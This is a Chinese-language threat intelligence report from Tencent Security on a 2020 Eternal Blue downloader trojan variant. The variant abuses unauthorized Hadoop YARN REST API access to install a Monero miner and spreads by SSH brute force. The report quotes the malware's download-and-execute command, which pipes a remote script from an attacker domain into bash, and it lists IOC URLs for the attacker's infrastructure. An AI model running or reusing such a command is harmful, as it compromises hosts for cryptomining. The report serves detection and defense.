产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
运维解决方案
品牌保护解决方案
高防云主机安全
腾讯安心平台解决方案
行业解决方案
游戏行业安全方案
电商行业安全方案
零售行业安全方案
安全专项解决方案
勒索病毒专项解决方案
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
开启你的安全之旅
联系我们
寻求市场合作
友情链接
腾讯云
未登录- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
正文永恒之蓝木马下载器再更新,云上主机成为新目标
2020-10-28 11:08:52
一、背景
腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马,然后将挖矿任务进行持久化、清除竞品挖矿木马,并通过SSH爆破横向移动。
永恒之蓝下载器木马自2018年底出现以来,一直处于活跃状态。该病毒不断变化和更新攻击手法,从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前,其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等,其中利用SSH、Redis、Hadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下:
|
攻击目标系统 |
Windows |
Linux |
|
主要攻击手法 |
Lnk漏洞CVE-2017-8464(通过移动设备) |
SSH爆破 |
|
office漏洞CVE-2017-8570(通过钓鱼邮件) |
Redis未授权访问漏洞 |
|
|
SMBGhost漏洞CVE-2020-0796 |
Hadoop Yarn未授权访问漏洞 |
|
|
永恒之蓝漏洞MS17-010 |
|
|
|
mssql爆破 |
|
|
|
RDP爆破 |
|
|
|
$IPC爆破 |
|
|
|
SMB爆破 |
|
腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 :
|
应用 场景 |
安全产品 |
解决方案 |
|
威 胁 情 报 |
腾讯T-Sec 威胁情报云查服务 (SaaS) |
1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
|
腾讯T-Sec 高级威胁追溯系统 |
1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
|
云原生安全 防护 |
云防火墙 (Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持: 1)永恒之蓝漏洞MS17-010; 2)SMBGhost漏洞CVE-2020-0796; 3)Redis未授权访问漏洞; 4)Hadoop Yarn未授权访问漏洞
有关云防火墙的更多信息,可参考: |
|
腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) |
已支持检测: 1)永恒之蓝漏洞MS17-010; 2)SMBGhost漏洞CVE-2020-0796; 3)Redis未授权访问漏洞; 4)Hadoop Yarn未授权访问漏洞
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
|
腾讯T-Sec 网络资产风险监测系统 (腾讯御知) |
1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html |
|
|
腾讯T-Sec 安全运营中心 |
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
|
非云企业安全防护 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
基于网络流量进行威胁检测,已支持检测: 1)永恒之蓝漏洞MS17-010; 2)SMBGhost漏洞CVE-2020-0796; 3)Redis未授权访问漏洞; 4)Hadoop Yarn未授权访问漏洞
关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
|
腾讯T-Sec终端安全管理系统(御点) |
1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序;
腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html |
二、详细分析
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。
YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,攻击者可以在未授权的情况下远程执行代码。
永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。
攻击成功后执行远程命令:
export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bash
core.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr,然后添加crontab定时任务将挖矿作业持久化。
清除竞品挖矿木马:
利用SSH爆破进行横向移动:
永恒之蓝下载器木马历次版本更新情况如下:
|
时间 |
主要技术点 |
|
2018年12月14日 |
利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 |
|
2018年12月19日 |
下载之后的木马新增Powershell后门安装。 |
|
2019年1月9日 |
检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
|
2019年1月24日 |
木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 |
|
2019年1月25日 |
木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 |
|
2019年2月10日 |
将攻击模块打包方式改为Pyinstaller。 |
|
2019年2月20日 |
更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
|
2019年2月23日 |
攻击方法再次更新,新增MsSQL爆破攻击。 |
|
2019年2月25日 |
在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
|
2019年3月6日 |
通过已感染机器后门更新Powershell脚本横向传播模块ipc。 |
|
2019年3月8日 |
通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 |
|
2019年3月14日 |
通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 |
|
2019年3月28日 |
更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、Passthehash+SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 |
|
2019年4月3日 |
开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 |
|
2019年7月19日 |
无文件攻击方法新增CVE-2017-8464Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 |
|
2019年10月9日 |
新增Bluekeep漏洞CVE-2019-0708检测上报功能。 |
|
2020年2月12日 |
使用DGA域名,篡改hosts文件。 |
|
2020年4月3日 |
新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 |
|
2020年4月17日 |
钓鱼邮件新增附件readme.zip、readme.doc,新增BypassUAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 |
|
2020年5月21日 |
新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 |
|
2020年6月10日 |
新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 |
|
2020年6月24日 |
重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPC、SMB爆破攻击。 |
|
2020年8月18日 |
新增利用Yarn未授权访问漏洞攻击Linux服务器 |
IOCs
URL
http[:]//d.ackng.com/ln/xr.zip
http[:]//t.amynx.com/ln/core.png
http[:]//t.amynx.com/ln/a.asp
http[:]//t.jdjdcjq.top/ln/a.asp
MD5
if.bin
888dc1ca4b18a3d424498244acf81f7d
a.jsp(powershell)
c21caa84b327262f2cbcc12bbb510d15
kr.bin
e04acec7ab98362d87d1c53d84fc4b03
core.png
e49367b9e942cf2b891f60e53083c938
a.jsp(shell)
b204ead0dcc9ca1053a1f26628725850
gim.jsp
b6f0e01c9e2676333490a750e58d4464
矿池:
lplp.ackng.com:444
参考链接:
1. Hadoop Yarn REST API未授权漏洞利用挖矿分析
https://www.freebuf.com/vuls/173638.html
2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知
https://bbs.qcloud.com/thread-50090-1-1.html
3. 永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器
https://s.tencent.com/research/report/1038.html
4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py
在线咨询